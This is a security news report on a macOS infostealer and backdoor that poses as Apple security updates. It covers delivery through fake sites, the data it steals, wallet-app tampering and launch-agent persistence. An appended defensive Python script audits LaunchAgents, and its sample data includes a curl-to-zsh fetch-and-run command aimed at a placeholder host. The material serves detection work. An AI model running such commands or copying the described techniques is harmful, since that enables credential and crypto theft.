A new version of the macOS data-stealing SHub has begun to impersonate official Apple security updates. The malware not only steals browser data and crypto wallets, but also installs a backdoor for persistent access to the system.
This delivery method circumvents the new security features that Apple added to macOS Tahoe 26.4 in late March, which are designed to block "suspicious" terminal commands.
SentinelOne indicates that the victims visited fake versions of WeChat and Miro. These sites appeared authentic to less experienced users. Domains found in the attack have included QQ-0732GWH22[.]com, MLROSOFT[.]CO[.]COM, and MLROWEB[.]COM.
Additionally, BleepingComputer discovered another interesting feature: when users clicked on either the Windows or Android download link, they received the exact same Dropbox-hosted executable file.
Prior to serving the installer, the websites collect data about the target's device. The script gathers telemetry on the device's operating environment, identifies whether a VPN or VM is present, and inspects installed browser extensions for cryptocurrency wallets and password managers. All of the collected information is then sent to the attacker via a Telegram bot.
Afterward, a dynamically generated malicious AppleScript is embedded within an ASCII image. Upon clicking the run button, the system displays a fake notification for an Apple XProtectRemediator update. At this point, the malware connects out and retrieves a shell script via curl, then executes that script via zsh without any further interaction.

Before activating, Reaper checks for signs that the keyboard is configured as Russian or that Russian is set as the preferred input language. When this is the case, Reaper reports "cis_blocked" back to its C2 server and stops at that point, without attempting to install itself on the computer.
Once Reaper has checked your settings, it launches the main component (osascript) and starts collecting data. It begins by prompting you to enter your macOS account password. Once you have entered it, Reaper can access your Keychain and other system-protected secrets.
SHub starts stealing the following from your computer:
Browser data from Google Chrome, Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc and Orion browsers.
Crypto related extensions including MetaMask and Phantom.
Data from 1Password, Bitwarden and LastPass password vaults.
Desktop Crypto Wallets from Exodus, Atomic Wallet, Ledger Live, Electrum and Trezor Suite.
Your iCloud data.
Your Telegram session(s).
Developer configurations and files.
FileGrabber is an additional SHub module that searches the Documents and Desktop directories for files containing financial or private information. FileGrabber collects any file type, but caps individual files at 2MB (6MB for PNG images) and the combined total at 150MB.

Once Reaper locates crypto wallet data, it tampers with that wallet application by terminating its process (e.g., Coinbase Wallet) and then downloading a malicious version of "app.asar" from the command-and-control server to overwrite the legitimate "app.asar".
The malicious version of the app is signed by SHub using its own code-signing certificates in order to avoid Gatekeeper warnings, and the quarantine attributes are cleared with an xattr -cr command.

In addition to stealing information from users' systems, Reaper establishes a launch agent that mimics a Google software updater. When Reaper's script executes (every minute), it sends the current operating system details to its management servers and can retrieve any payloads the operator has made available, executing them with the permissions of the currently logged-in user.
The SentinelOne researchers note that SHub has evolved over time from a simple info-stealer into a fully realized Remote Access Tool (RAT) that allows the operator to download additional malicious code onto compromised machines.
Administrators should watch for Script Editor launches, unusual network connections, newly created Launch Agents, and files mimicking legitimate services from reputable providers.
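The following is an added example, not code from the article or from SentinelOne, of how a defender might audit a user's LaunchAgents directory for the kind of persistence described above: an agent with a Google-looking label that runs a shell interpreter, pulls content with curl, and re-runs every minute. The sample plists, the heuristic thresholds, and the assumption that a genuine Google agent runs from a Google install path are all constructed for illustration.

```python
import plistlib
import tempfile
from pathlib import Path

# Constructed sample LaunchAgents (not from the article): one mimicking a Google
# updater that pipes a curl download into zsh every minute, one benign for contrast.
SAMPLE_AGENTS = {
    "com.google.keystone.agent.plist": {
        "Label": "com.google.keystone.agent",
        "ProgramArguments": ["/bin/zsh", "-c", "curl -s http://c2.invalid/p | zsh"],
        "StartInterval": 60,
    },
    "com.example.backup.plist": {
        "Label": "com.example.backup",
        "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/backup"],
        "StartInterval": 3600,
    },
}
INTERPRETERS = ("/bin/zsh", "/bin/bash", "/bin/sh", "/usr/bin/osascript")


def audit_agent(plist: dict) -> list[str]:
    """Return the reasons a LaunchAgent plist resembles the persistence above."""
    args = plist.get("ProgramArguments") or []
    cmdline = " ".join(str(a) for a in args)
    reasons = []
    if args and args[0] in INTERPRETERS:
        reasons.append("program is a shell/osascript interpreter, not an app binary")
    if "curl " in cmdline or "osascript" in cmdline:
        reasons.append("command line fetches or evaluates remote content")
    if 0 < int(plist.get("StartInterval", 0)) <= 60:
        reasons.append("re-runs every minute or faster")
    # Heuristic assumption: a genuine Google agent runs from a Google install path.
    if "google" in plist.get("Label", "").lower() and "/google" not in cmdline.lower():
        reasons.append("label claims Google software but program is not in a Google path")
    return reasons


def audit_directory(directory: Path) -> dict[str, list[str]]:
    """Audit every .plist in a LaunchAgents directory; return only flagged ones."""
    findings = {}
    for path in sorted(directory.glob("*.plist")):
        reasons = audit_agent(plistlib.loads(path.read_bytes()))
        if reasons:
            findings[path.name] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    # Write the constructed samples to a temp directory and audit them offline.
    tmp = Path(tempfile.mkdtemp())
    for name, content in SAMPLE_AGENTS.items():
        (tmp / name).write_bytes(plistlib.dumps(content))
    return audit_directory(tmp)
```

On a live macOS host, call `audit_directory(Path.home() / "Library" / "LaunchAgents")` and treat any hit as a lead to investigate, not a verdict.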